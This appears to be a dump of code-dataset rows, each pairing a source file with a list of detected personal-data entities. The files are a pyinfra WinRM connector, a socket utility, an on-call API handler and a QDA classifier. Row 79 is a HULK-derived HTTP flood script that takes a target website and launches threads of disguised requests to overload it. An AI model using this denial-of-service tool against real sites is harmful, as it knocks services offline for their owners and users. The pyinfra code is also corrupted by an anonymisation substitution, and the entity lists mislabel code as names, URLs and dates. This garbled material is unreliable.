'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['URL', 'https://github.com/bitcoin/bitcoin/issues/20579'], ['URL', 'framework.me'], ['URL', 'self.se'], ['URL', 'self.nu'], ['URL', 'self.su'], ['URL', 'self.sk'], ['URL', 'self.co'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.options.de'], ['URL', 'self.no'], ['URL', 
'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no']] |
77 | from __future__ import print_function, unicode_literals
import base64
import ntpath
import click
from pyinfra import logger
from pyinfra.api import Config
from pyinfra.api.exceptions import ConnectError, PyinfraError
from pyinfra.api.util import get_file_io, memoize, sha1_hash
from .pyinfrawinrmsession import PyinfraWinrmSession
from .util import make_win_command
def _raise_connect_error(host, message, data):
message = '{0} ({1})'.format(message, data)
raise ConnectError(message)
@memoize
def show_warning():
logger.warning('The @winrm connector is alpha!')
def _make_winrm_kwargs(state, host):
kwargs = {
}
for key, value in (
('username', host.data.winrm_user),
('password', host.data.winrm_password),
('winrm_port', int(host.data.winrm_port or 0)),
('winrm_transport', host.data.winrm_transport or 'plaintext'),
('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30),
('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20),
):
if value:
kwargs[key] = value
# FUTURE: add more auth
# pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp
# see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12
return kwargs
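# Illustration (added note): with inventory data such as
#   host.data.winrm_user = 'Administrator'
#   host.data.winrm_port = 5985
# and nothing else set, _make_winrm_kwargs returns
#   {'username': 'Administrator', 'winrm_port': 5985,
#    'winrm_transport': 'plaintext', 'winrm_read_timeout_sec': 30,
#    'winrm_operation_timeout_sec': 20}
# i.e. unset values are skipped and the defaults wired into the loop above apply.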
def make_names_data(hostname):
show_warning()
yield dummy@email.com(hostname), {'winrm_hostname': hostname}, []
def connect(state, host):
'''
Connect to a single host. Returns the winrm Session if successful.
'''
kwargs = _make_winrm_kwargs(state, host)
logger.debug('Connecting to: %s (%s)', host.name, kwargs)
    # Hostname can be provided via winrm config (alias), data, or the host's name
hostname = kwargs.pop(
'hostname',
host.data.winrm_hostname or host.name,
)
try:
# Create new session
host_and_port = '{}:{}'.format(hostname, host.data.winrm_port)
logger.debug('host_and_port: %s', host_and_port)
session = PyinfraWinrmSession(
host_and_port,
auth=(
kwargs['username'],
kwargs['password'],
),
transport=kwargs['winrm_transport'],
read_timeout_sec=kwargs['winrm_read_timeout_sec'],
operation_timeout_sec=kwargs['winrm_operation_timeout_sec'],
)
return session
# TODO: add exceptions here
except Exception as e:
auth_kwargs = {}
for key, value in kwargs.items():
if key in ('username', 'password'):
auth_kwargs[key] = value
auth_args = ', '.join(
'{0}={1}'.format(key, value)
for key, value in auth_kwargs.items()
)
logger.debug('%s', e)
_raise_connect_error(host, 'Authentication error', auth_args)
def run_shell_command(
state, host, command,
env=None,
success_exit_codes=None,
print_output=False,
print_input=False,
return_combined_output=False,
shell_executable=Config.SHELL,
**ignored_command_kwargs
):
'''
Execute a command on the specified host.
Args:
state (``pyinfra.api.State`` obj): state object for this command
hostname (string): hostname of the target
command (string): actual command to execute
success_exit_codes (list): all values in the list that will return success
print_output (boolean): print the output
        print_input (boolean): print the input
return_combined_output (boolean): combine the stdout and stderr lists
shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell(default)
env (dict): environment variables to set
Returns:
tuple: (exit_code, stdout, stderr)
stdout and stderr are both lists of strings from each buffer.
'''
command = make_win_command(command)
logger.debug('Running command on %s: %s', host.name, command)
if print_input:
click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True)
# get rid of leading/trailing quote
tmp_command = command.strip("'")
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, command),
err=True,
)
if not shell_executable:
shell_executable = 'ps'
logger.debug('shell_executable:%s', shell_executable)
# we use our own subclassed session that allows for env setting from open_shell.
if shell_executable in ['cmd']:
response = host.connection.run_cmd(tmp_command, env=env)
else:
response = host.connection.run_ps(tmp_command, env=env)
return_code = response.status_code
logger.debug('response:%s', response)
std_out_str = response.std_out.decode('utf-8')
std_err_str = response.std_err.decode('utf-8')
# split on '\r\n' (windows newlines)
std_out = std_out_str.split('\r\n')
std_err = std_err_str.split('\r\n')
logger.debug('std_out:%s', std_out)
logger.debug('std_err:%s', std_err)
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)),
err=True,
)
if success_exit_codes:
status = return_code in success_exit_codes
else:
status = return_code == 0
logger.debug('Command exit status: %s', status)
if return_combined_output:
std_out = [('stdout', line) for line in std_out]
std_err = [('stderr', line) for line in std_err]
return status, std_out + std_err
return status, std_out, std_err
def get_file(
state, host, remote_filename, filename_or_io,
**command_kwargs
):
raise PyinfraError('Not implemented')
def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):
# this should work fine on smallish files, but there will be perf issues
# on larger files both due to the full read, the base64 encoding, and
# the latency when sending chunks
with get_file_io(filename_or_io) as file_io:
data = file_io.read()
for i in range(0, len(data), chunk_size):
chunk = data[i:i + chunk_size]
ps = (
'$data = [System.Convert]::FromBase64String("{0}"); '
'{1} -Value $data -Encoding byte -Path "{2}"'
).format(
base64.b64encode(chunk).decode('utf-8'),
'Set-Content' if i == 0 else 'Add-Content',
remote_location)
status, _stdout, stderr = run_shell_command(state, host, ps)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
return True
def put_file(
state, host, filename_or_io, remote_filename,
print_output=False, print_input=False,
**command_kwargs
):
'''
Upload file by chunking and sending base64 encoded via winrm
'''
# Always use temp file here in case of failure
temp_file = ntpath.join(
host.fact.windows_temp_dir(),
'pyinfra-{0}'.format(sha1_hash(remote_filename)),
)
if not _put_file(state, host, filename_or_io, temp_file):
return False
# Execute run_shell_command w/sudo and/or su_user
command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename)
status, _, stderr = run_shell_command(
state, host, command,
print_output=print_output,
print_input=print_input,
**command_kwargs
)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
if print_output:
click.echo(
'{0}file uploaded: {1}'.format(host.print_prefix, remote_filename),
err=True,
)
return True
EXECUTION_CONNECTOR = True
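# Usage sketch (illustrative, not part of the original module): once pyinfra
# has built `state` and `host` for a @winrm inventory entry, the connector
# is exercised roughly like this; the command below is hypothetical.
#
#   session = connect(state, host)
#   status, std_out, std_err = run_shell_command(
#       state, host, 'Get-ChildItem C:\\', shell_executable='ps',
#       print_output=True)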
| 7,847 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'winrm_port'], ['PERSON', 'winrm_transport'], ['PERSON', 'host.data.winrm_transport'], ['PERSON', 'host.data.winrm_hostname'], ['PERSON', 'host_and_port'], ['PERSON', 'TODO'], ['PERSON', 'Args'], ['DATE_TIME', "1}'.format(host.print_prefix"], ['PERSON', 'tmp_command = command.strip'], ['DATE_TIME', "1}'.format(host.print_prefix"], ['DATE_TIME', "1}'.format(host.print_prefix"], ['LOCATION', 'chunk_size=2048'], ['DATE_TIME', "1}'.format(host.print_prefix"], ['URL', 'https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12'], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'host.na'], ['URL', 'logger.de'], ['URL', 'kwargs.it'], ['URL', 'kwargs.it'], ['URL', 'logger.de'], ['URL', 'Config.SH'], ['URL', 'pyinfra.api.St'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'command.st'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'host.connection.ru'], ['URL', 'host.connection.ru'], ['URL', 'response.st'], ['URL', 'logger.de'], ['URL', 'response.st'], ['URL', 'out.de'], ['URL', 'response.st'], ['URL', 'err.de'], ['URL', 'logger.de'], ['URL', 'logger.de'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'io.re'], ['URL', 'System.Co'], ['URL', 'logger.er'], ['URL', 'ntpath.jo'], ['URL', 'logger.er'], ['URL', 'click.ec'], ['URL', 'host.pr']] |
78 | #
# (C) Copyright 2011 Jacek Konieczny dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# pylint: disable-msg=W0201
"""Utility functions to wait until a socket (or object implementing .fileno()
in POSIX) is ready for input or output."""
from __future__ import absolute_import, division
__docformat__ = "restructuredtext en"
import select
if hasattr(select, "poll"):
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLIN)
events = poll.poll(timeout)
return bool(events)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLOUT)
events = poll.poll(timeout)
return bool(events)
else:
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
readable = select.select([socket], [], [], timeout)[0]
return bool(readable)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
writable = select.select([], [socket], [], timeout)[1]
return bool(writable)
| 2,121 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2011'], ['PERSON', 'Jacek Konieczny'], ['LOCATION', 'Mass Ave'], ['LOCATION', 'Cambridge'], ['LOCATION', 'MA 02139'], ['LOCATION', 'USA'], ['URL', 'email.com'], ['URL', 'poll.re'], ['URL', 'poll.re'], ['URL', 'select.se'], ['URL', 'select.se']] |
79 | """
HTTP UNBEARABLE LOAD QUEEN
A HULK EDIT BY @OBN0XIOUS
THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY
"""
import sys
import argparse
import random
from threading import Thread
import hulqThreading
import hulqRequest
parser = argparse.ArgumentParser()
parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.')
parser.add_argument('--website', '-w', help='Website you are attacking.')
systemArguments = parser.parse_args()
if not systemArguments.website:
sys.exit("Provide -w or --website.")
userAgents = \
(
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1', \
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \ like Gecko Chrome/4.0.219.6 Safari/532.1', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \
'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51'
)
referers = \
(
'http://www.google.com/?q=', \
'http://www.usatoday.com/search/results?q=', \
'http://engadget.search.aol.com/search?q='
)
for i in range(0, int(systemArguments.threads)):
referer = random.choice(referers)
userAgent = random.choice(userAgents)
t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))
t1.start()
| 2,175 | [['LOCATION', "help='Choose"], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['LOCATION', 'US'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['URL', 't1.st'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '4.0.219.6'], ['DATE_TIME', '1.1.4322'], ['DATE_TIME', '2.5.22'], ['URL', "http://www.google.com/?q=',"], ['URL', "http://www.usatoday.com/search/results?q=',"], ['URL', "http://engadget.search.aol.com/search?q='"], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'systemArguments.th'], ['URL', 'random.ch'], ['URL', 'random.ch'], ['URL', 'hulqRequest.ht']] |
80 | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import json
import time
from .events import on_get as get_events
from collections import defaultdict
import requests
from ujson import dumps as json_dumps
from falcon import HTTPStatus, HTTP_200
class PaidEvents(object):
def __init__(self, config):
self.config = config
def on_get(self, req, resp):
"""
Search for events. Allows filtering based on a number of parameters,
detailed below. Also returns only the users who are paid to be on call. Uses response from
oncall-bonus to identify paid status.
**Example request**:
.. sourcecode:: http
GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"ldap_user_id":
[
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": null,
"schedule_id": null,
"role": "primary",
"user": "foo",
"full_name": "Foo Icecream",
"id": 187795
},
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": "PI:KEY",
"schedule_id": 123,
"role": "primary",
"user": "bar",
"full_name": "Bar Apple",
"id": 187795
}
]
]
:query team: team name
:query user: user name
:query role: role name
:query id: id of the event
:query start: start time (unix timestamp) of event
:query end: end time (unix timestamp) of event
:query start__gt: start time (unix timestamp) greater than
:query start__ge: start time (unix timestamp) greater than or equal
:query start__lt: start time (unix timestamp) less than
:query start__le: start time (unix timestamp) less than or equal
:query end__gt: end time (unix timestamp) greater than
:query end__ge: end time (unix timestamp) greater than or equal
:query end__lt: end time (unix timestamp) less than
:query end__le: end time (unix timestamp) less than or equal
:query role__eq: role name
:query role__contains: role name contains param
:query role__startswith: role name starts with param
:query role__endswith: role name ends with param
:query team__eq: team name
:query team__contains: team name contains param
:query team__startswith: team name starts with param
:query team__endswith: team name ends with param
:query team_id: team id
:query user__eq: user name
:query user__contains: user name contains param
:query user__startswith: user name starts with param
:query user__endswith: user name ends with param
:statuscode 200: no error
:statuscode 400: bad request
"""
config = self.config
oncall_bonus_blacklist = config.get('bonus_blacklist', [])
oncall_bonus_whitelist = config.get('bonus_whitelist', [])
bonus_url = config.get('bonus_url', None)
ldap_grouping = defaultdict(list)
# if start time is not specified only fetch events in the future
if not req.params.get('start__gt'):
req.params['start__gt'] = str(int(time.time()))
get_events(req, resp)
        # fetch team data from an external oncall-bonus api
try:
bonus_response = requests.get(bonus_url)
bonus_response.raise_for_status()
except requests.exceptions.RequestException:
raise HTTPStatus('503 failed to contact oncall-bonus API')
oncall_bonus_teams = bonus_response.json()
for event in json.loads(resp.body):
if event['role'].lower() == 'manager':
continue
team = event['team']
if team in oncall_bonus_whitelist:
ldap_grouping[event['user']].append(event)
continue
if team in oncall_bonus_blacklist:
continue
            # check if the event's role is paid for that team
team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None)
if team_payment_details:
team_payed_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)}
if team_payed_roles.get(event['role']):
ldap_grouping[event['user']].append(event)
resp.status = HTTP_200
resp.body = json_dumps(ldap_grouping)
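# Wiring sketch (illustrative, not in the original file): how this resource
# might be mounted on a falcon API object; the route mirrors the docstring's
# example request.
#
#   app = falcon.API()
#   app.add_route('/api/v0/oncall_events', PaidEvents(config))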
| 5,345 | [['LOCATION', 'BSD-2'], ['NRP', 'self.config'], ['URL', 'config.ge'], ['URL', 'requests.ge'], ['URL', 'requests.exceptions.Re'], ['PERSON', "team_payment_details.get('primary_paid"], ['PERSON', "team_payment_details.get('secondary_paid"], ['PHONE_NUMBER', '1487466146'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'de:: '], ['URL', 'self.co'], ['URL', 'example.com'], ['URL', 'self.co'], ['URL', 'config.ge'], ['URL', 'config.ge'], ['URL', 'req.params.ge'], ['URL', 'req.pa'], ['URL', 'resp.bo'], ['URL', 'item.ge'], ['URL', 'details.ge'], ['URL', 'details.ge'], ['URL', 'roles.ge'], ['URL', 'resp.st'], ['URL', 'resp.bo']] |
81 | """
Quadratic Discriminant Analysis
"""
# Author: Matthieu Perrot dummy@email.com
#
# License: BSD Style.
import warnings
import numpy as np
import scipy.ndimage as ndimage
from .base import BaseEstimator, ClassifierMixin
# FIXME :
# - in fit(X, y) method, many checks are common with other models
# (in particular LDA model) and should be factorized:
# maybe in BaseEstimator ?
class QDA(BaseEstimator, ClassifierMixin):
"""
Quadratic Discriminant Analysis (QDA)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
priors : array, optional, shape = [n_classes]
Priors on classes
Attributes
----------
`means_` : array-like, shape = [n_classes, n_features]
Class means
`priors_` : array-like, shape = [n_classes]
Class priors (sum to 1)
`covariances_` : list of array-like, shape = [n_features, n_features]
Covariance matrices of each class
Examples
--------
>>> from sklearn.qda import QDA
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = QDA()
>>> clf.fit(X, y)
QDA(priors=None)
>>> print clf.predict([[-0.8, -1]])
[1]
See also
--------
LDA
"""
def __init__(self, priors=None):
self.priors = np.asarray(priors) if priors is not None else None
def fit(self, X, y, store_covariances=False, tol=1.0e-4):
"""
Fit the QDA model according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target values (integers)
store_covariances : boolean
If True the covariance matrices are computed and stored in the
self.covariances_ attribute.
"""
X = np.asarray(X)
y = np.asarray(y)
if X.ndim != 2:
raise ValueError('X must be a 2D array')
if X.shape[0] != y.shape[0]:
raise ValueError(
'Incompatible shapes: X has %s samples, while y '
'has %s' % (X.shape[0], y.shape[0]))
if y.dtype.char.lower() not in ('b', 'h', 'i'):
# We need integer values to be able to use
# ndimage.measurements and np.bincount on numpy >= 2.0.
# We currently support (u)int8, (u)int16 and (u)int32.
# Note that versions of scipy >= 0.8 can also accept
# (u)int64. We however don't support it for backwards
# compatibility.
y = y.astype(np.int32)
n_samples, n_features = X.shape
classes = np.unique(y)
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
classes_indices = [(y == c).ravel() for c in classes]
if self.priors is None:
counts = np.array(ndimage.measurements.sum(
np.ones(n_samples, dtype=y.dtype), y, index=classes))
self.priors_ = counts / float(n_samples)
else:
self.priors_ = self.priors
cov = None
if store_covariances:
cov = []
means = []
scalings = []
rotations = []
for group_indices in classes_indices:
Xg = X[group_indices, :]
meang = Xg.mean(0)
means.append(meang)
Xgc = Xg - meang
# Xgc = U * S * V.T
U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
rank = np.sum(S > tol)
if rank < n_features:
warnings.warn("Variables are collinear")
S2 = (S ** 2) / (len(Xg) - 1)
if store_covariances:
# cov = V * (S^2 / (n-1)) * V.T
cov.append(np.dot(S2 * Vt.T, Vt))
scalings.append(S2)
rotations.append(Vt.T)
if store_covariances:
self.covariances_ = cov
self.means_ = np.asarray(means)
self.scalings = np.asarray(scalings)
self.rotations = rotations
self.classes = classes
return self
def decision_function(self, X):
"""Apply decision function to an array of samples.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples (test vectors).
Returns
-------
C : array, shape = [n_samples, n_classes]
Decision function values related to each class, per sample.
"""
X = np.asarray(X)
norm2 = []
for i in range(len(self.classes)):
R = self.rotations[i]
S = self.scalings[i]
Xm = X - self.means_[i]
X2 = np.dot(Xm, R * (S ** (-0.5)))
norm2.append(np.sum(X2 ** 2, 1))
norm2 = np.array(norm2).T # shape = [len(X), n_classes]
return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))
+ np.log(self.priors_))
def predict(self, X):
"""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
"""
d = self.decision_function(X)
y_pred = self.classes[d.argmax(1)]
return y_pred
def predict_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior probabilities of classification per class.
"""
values = self.decision_function(X)
# compute the likelihood of the underlying gaussian models
# up to a multiplicative constant.
likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])
# compute posterior probabilities
return likelihood / likelihood.sum(axis=1)[:, np.newaxis]
def predict_log_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior log-probabilities of classification per class.
"""
# XXX : can do better to avoid precision overflows
probas_ = self.predict_proba(X)
return np.log(probas_)
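# Usage sketch (added illustration): because of the relative imports above,
# this module is exercised through the installed package, as in the class
# docstring:
#   from sklearn.qda import QDA
#   clf = QDA().fit(X, y)         # X, y as in the docstring example
#   clf.predict([[-0.8, -1]])     # -> array([1])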
